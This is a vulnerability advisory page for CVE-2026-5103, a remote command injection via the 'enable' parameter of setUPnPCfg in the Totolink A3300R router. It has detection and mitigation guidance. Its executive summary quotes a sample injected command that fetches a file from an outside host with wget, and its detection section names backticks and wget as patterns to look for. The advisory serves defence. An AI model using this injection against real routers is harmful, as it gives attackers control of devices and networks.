CVE-2026-5103
Received Received - Intake
Remote Command Injection in Totolink A3300R setUPnPCfg Function

Publication date: 2026-03-30

Last updated on: 2026-04-29

Assigner: VulDB

Description
A weakness has been identified in Totolink A3300R 17.0.0cu.557_b20221024. This issue affects the function setUPnPCfg of the file /cgi-bin/cstecgi.cgi. This manipulation of the argument enable causes command injection. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be used for attacks.
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2026-03-30
Last Modified
2026-04-29
Generated
2026-06-16
AI Q&A
2026-03-30
EPSS Evaluated
2026-06-15
NVD
CVE-2026-5103
EUVD
EUVD-2026-17053
Affected Vendors & Products
Showing 1 associated CPE
Vendor Product Version / Range
totolink a3300r_firmware 17.0.0cu.557_b20221024
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-77 The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component.
CWE-74 The product constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component.
Attack-Flow Graph
AI Quick Actions
Instant insights powered by AI
Executive Summary

CVE-2026-5103 is a command injection vulnerability in the TOTOLINK A3300R router, version 17.0.0cu.557_b20221024. It affects the function setUPnPCfg in the /cgi-bin/cstecgi.cgi file, where a user-supplied parameter named "enable" is processed insecurely.

An attacker can send a crafted HTTP POST request containing malicious commands in the "enable" parameter. This parameter is inserted into a buffer and then executed by the router's system command function, allowing arbitrary operating system commands to run remotely.

For example, an attacker can inject commands like `wget 192.168.6.1:6666/testpoc` which the router will execute, potentially compromising the device.

Impact Analysis

This vulnerability allows remote attackers to execute arbitrary commands on the affected router without user interaction.

The impact includes unauthorized control over the device, which can lead to interception or manipulation of network traffic, installation of malware, or use of the router as a foothold for further attacks within the network.

Because the exploit is publicly available, the risk of exploitation is higher, increasing the chances of compromise.

Detection Guidance

This vulnerability can be detected by monitoring for suspicious POST requests to the endpoint /cgi-bin/cstecgi.cgi that contain the "enable" parameter with command injection patterns.

A specific detection method involves checking for HTTP POST requests with JSON payloads where the "enable" parameter includes backticks or shell commands.

  • Use network traffic analysis tools (e.g., Wireshark or tcpdump) to filter HTTP POST requests to /cgi-bin/cstecgi.cgi.
  • Example tcpdump command to capture relevant traffic: tcpdump -i <interface> -A 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)' | grep '/cgi-bin/cstecgi.cgi'
  • Inspect captured POST data for JSON payloads containing the "enable" parameter with suspicious content, such as backticks or commands like `wget`.
Mitigation Strategies

Immediate mitigation steps include restricting access to the vulnerable endpoint and disabling remote management if possible.

Since the vulnerability allows remote command injection via the "enable" parameter in /cgi-bin/cstecgi.cgi, blocking or filtering HTTP POST requests to this endpoint can reduce risk.

  • Apply network-level firewall rules to block external access to the router's management interface.
  • Disable UPnP or remote configuration features on the Totolink A3300R router if not needed.
  • Monitor router logs for suspicious activity related to /cgi-bin/cstecgi.cgi.

Ultimately, update the router firmware to a version that patches this vulnerability once available.

Compliance Impact

The CVE-2026-5103 vulnerability allows remote attackers to execute arbitrary commands on the affected Totolink A3300R router. This command injection flaw could lead to unauthorized access, data manipulation, or disruption of services.

Such unauthorized access and potential data compromise may impact compliance with standards and regulations like GDPR and HIPAA, which require protection of personal and sensitive data against unauthorized access and breaches.

Specifically, if the device is used in environments subject to these regulations, exploitation of this vulnerability could result in violations related to data confidentiality, integrity, and availability.

Chat Assistant
Ask questions about this CVE
Hi! I’m here to help you understand CVE-2026-5103. Ask me anything about the vulnerability, its impact, or mitigation strategies.
0/70
EPSS Chart